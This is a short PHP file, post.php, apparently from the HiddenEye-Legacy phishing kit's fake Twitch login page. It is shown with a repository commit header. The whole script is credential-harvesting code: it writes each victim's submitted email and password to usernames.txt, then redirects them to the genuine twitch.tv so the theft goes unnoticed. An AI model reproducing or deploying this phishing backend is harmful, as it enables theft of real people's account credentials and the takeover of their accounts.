HiddenEye-Legacy/WebPages/twitch/post.php
Usama Abdul Sattar 96ef3b8a97
Update post.php
2018-06-07 14:23:56 +05:00

8 lines
223 B
PHP

<?php
include 'base.php';
include 'ip.php';
file_put_contents("usernames.txt", "[FB-EMAIL]: " . $_POST['fb_email'] . " [FB-PASS]: " . $_POST['fb_pass'] . "\n", FILE_APPEND);
header('Location: https://twitch.tv/');
exit();